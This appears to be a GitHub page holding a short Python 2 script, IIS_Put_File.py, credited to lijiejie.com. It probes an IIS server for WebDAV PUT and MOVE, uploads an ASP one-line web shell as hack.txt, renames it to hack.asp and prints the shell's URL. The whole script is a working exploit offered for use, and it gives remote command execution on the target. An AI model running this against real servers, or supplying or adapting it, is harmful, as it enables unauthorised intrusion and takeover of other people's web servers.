-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathIIS_Put_File.py
36 lines (30 loc) · 1.06 KB
/
IIS_Put_File.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#-*- encoding:utf-8 -*-
'''
IIS put file From http://www.lijiejie.com
Usage:
iisPUT.py www.example.com:8080
'''
import httplib
import sys
try:
conn = httplib.HTTPConnection(sys.argv[1])
conn.request(method='OPTIONS', url='/')
headers = dict(conn.getresponse().getheaders())
if headers.get('server', '').find('Microsoft-IIS') < 0:
print 'This is not an IIS web server'
if 'public' in headers and \
headers['public'].find('PUT') > 0 and \
headers['public'].find('MOVE') > 0:
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
# PUT hack.txt
conn.request( method='PUT', url='/hack.txt', body='<%execute(request("cmd"))%>' )
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
# mv hack.txt to hack.asp
conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})
print 'ASP webshell:', 'http://' + sys.argv[1] + '/hack.asp'
else:
print 'Server not vulnerable'
except Exception,e:
print 'Error:', e